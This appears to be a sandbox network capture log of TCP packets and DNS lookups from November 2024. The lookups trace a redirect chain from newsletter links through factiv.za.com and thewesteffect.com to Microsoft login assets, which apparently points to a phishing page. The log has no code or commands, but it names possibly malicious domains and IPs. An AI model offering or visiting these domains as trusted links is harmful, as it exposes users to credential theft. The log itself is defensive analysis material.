                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.717708111 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.717801094 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.717942953 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.717979908 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.800623894 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.801112890 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.801137924 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.801645994 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.801651955 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.878618002 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.879175901 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.879240036 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.879801989 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.879818916 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.925472021 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.927351952 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.927351952 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.927387953 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.927407980 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.928463936 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.928920031 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.929008007 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.929246902 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.929263115 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932312012 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932384968 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932435036 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932560921 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932560921 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932595968 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.932617903 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.935431957 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.935494900 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.938132048 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.938132048 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.938179970 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012310982 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012332916 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012391090 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012429953 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012623072 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012677908 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012677908 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012720108 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.012747049 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.015515089 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.015611887 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.015681028 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.015856028 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.015889883 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057254076 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057406902 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057503939 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057517052 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057694912 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057694912 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.057694912 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060257912 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060355902 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060483932 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060723066 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060755968 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060889959 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060929060 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060981989 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.060988903 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.061028004 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.061216116 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.061216116 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.061239958 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.061260939 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.063841105 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.063935041 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.064018965 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.064153910 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.064191103 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.263333082 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.263374090 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.667198896 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.667665005 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.667686939 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.668262959 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.668271065 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.797203064 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.797749996 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.797768116 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.798362970 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.798368931 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.798486948 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.798928022 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799004078 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799041986 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799045086 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799055099 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799226046 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799242973 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799253941 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799257994 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799478054 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799487114 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.799514055 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.800002098 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.800023079 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.800451040 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.800462008 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.802349091 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.802408934 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.802475929 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.802601099 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.802619934 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.834368944 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.834857941 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.834904909 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.835403919 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.835411072 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930439949 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930510044 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930526972 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930589914 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930629969 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930687904 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930725098 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930797100 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930824041 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.930988073 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931039095 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931068897 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931085110 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931214094 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931214094 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931258917 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931291103 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931623936 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931673050 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931788921 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.931788921 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.932164907 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.932207108 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.932257891 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.932264090 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.934727907 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.934779882 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.934876919 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.934914112 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.934930086 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935060978 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935067892 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935081005 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935162067 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935169935 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935472012 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935506105 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935616016 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935838938 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.935853004 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.981851101 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.981873989 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.981937885 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.981936932 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.981982946 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.982228994 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.982266903 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.982291937 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.982306004 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.985064030 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.985102892 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.985157967 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.985321999 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:56.985332966 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:33.336023092 CET53652651.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:33.390425920 CET53630501.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:34.741466999 CET53620641.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.100765944 CET6206653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.100920916 CET4951853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.893156052 CET5551053192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.893627882 CET6312253192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.901853085 CET53555101.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.902503967 CET53631221.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.186295033 CET6542353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.186680079 CET5874553192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.193387985 CET53654231.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.193751097 CET53587451.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.137330055 CET6311153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.138331890 CET5267653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.176856995 CET53631111.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.177011013 CET53526761.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.446131945 CET5795153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.446861982 CET5997953192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.745620012 CET53599791.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.748142958 CET53579511.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.008742094 CET4960053192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.009188890 CET5633653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.016532898 CET53563361.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET53496001.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.454596996 CET6359753192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.454987049 CET6521853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.734011889 CET53635971.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.954664946 CET53652181.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.478292942 CET5256353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.478667021 CET4923953192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.479615927 CET6143353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.479727030 CET6217853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.485626936 CET53525631.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET53614331.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.503333092 CET53492391.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.528302908 CET5005353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.529830933 CET5683553192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.535093069 CET53500531.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.536809921 CET53568351.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.546648979 CET53621781.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.592459917 CET53617721.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.641607046 CET5419753192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.641932964 CET6257353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.648329020 CET53541971.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649312973 CET53625731.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:49.570935965 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:51.788021088 CET53564531.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:10.541702986 CET53509731.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.047225952 CET53627491.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:33.412237883 CET53550411.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:35.661011934 CET53571201.1.1.1192.168.2.4
                                                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.954763889 CET192.168.2.41.1.1.1c22f(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.100765944 CET192.168.2.41.1.1.10xc1b9Standard query (0)ljppcv.us8.list-manage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.100920916 CET192.168.2.41.1.1.10xd18Standard query (0)ljppcv.us8.list-manage.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.893156052 CET192.168.2.41.1.1.10x6d29Standard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.893627882 CET192.168.2.41.1.1.10x606dStandard query (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.186295033 CET192.168.2.41.1.1.10x13baStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.186680079 CET192.168.2.41.1.1.10xd404Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.137330055 CET192.168.2.41.1.1.10x5739Standard query (0)factiv.za.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.138331890 CET192.168.2.41.1.1.10xd509Standard query (0)factiv.za.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.446131945 CET192.168.2.41.1.1.10x6b33Standard query (0)thewesteffect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.446861982 CET192.168.2.41.1.1.10x4205Standard query (0)thewesteffect.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.008742094 CET192.168.2.41.1.1.10x68afStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.009188890 CET192.168.2.41.1.1.10x47b4Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.454596996 CET192.168.2.41.1.1.10xac96Standard query (0)thewesteffect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.454987049 CET192.168.2.41.1.1.10xe83cStandard query (0)thewesteffect.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.478292942 CET192.168.2.41.1.1.10x691fStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.478667021 CET192.168.2.41.1.1.10xea36Standard query (0)www.w3schools.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.479615927 CET192.168.2.41.1.1.10x81baStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.479727030 CET192.168.2.41.1.1.10xce7Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.528302908 CET192.168.2.41.1.1.10xceaStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.529830933 CET192.168.2.41.1.1.10x20d3Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.641607046 CET192.168.2.41.1.1.10x8208Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.641932964 CET192.168.2.41.1.1.10xd6beStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.133856058 CET1.1.1.1192.168.2.40xd18No error (0)ljppcv.us8.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:35.145490885 CET1.1.1.1192.168.2.40xc1b9No error (0)ljppcv.us8.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.901853085 CET1.1.1.1192.168.2.40x6d29No error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.901853085 CET1.1.1.1192.168.2.40x6d29No error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.902503967 CET1.1.1.1192.168.2.40x606dNo error (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.193387985 CET1.1.1.1192.168.2.40x13baNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.193751097 CET1.1.1.1192.168.2.40xd404No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.176856995 CET1.1.1.1192.168.2.40x5739No error (0)factiv.za.com185.221.216.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.748142958 CET1.1.1.1192.168.2.40x6b33No error (0)thewesteffect.com192.254.232.133A (IP address)IN (0x0001)false
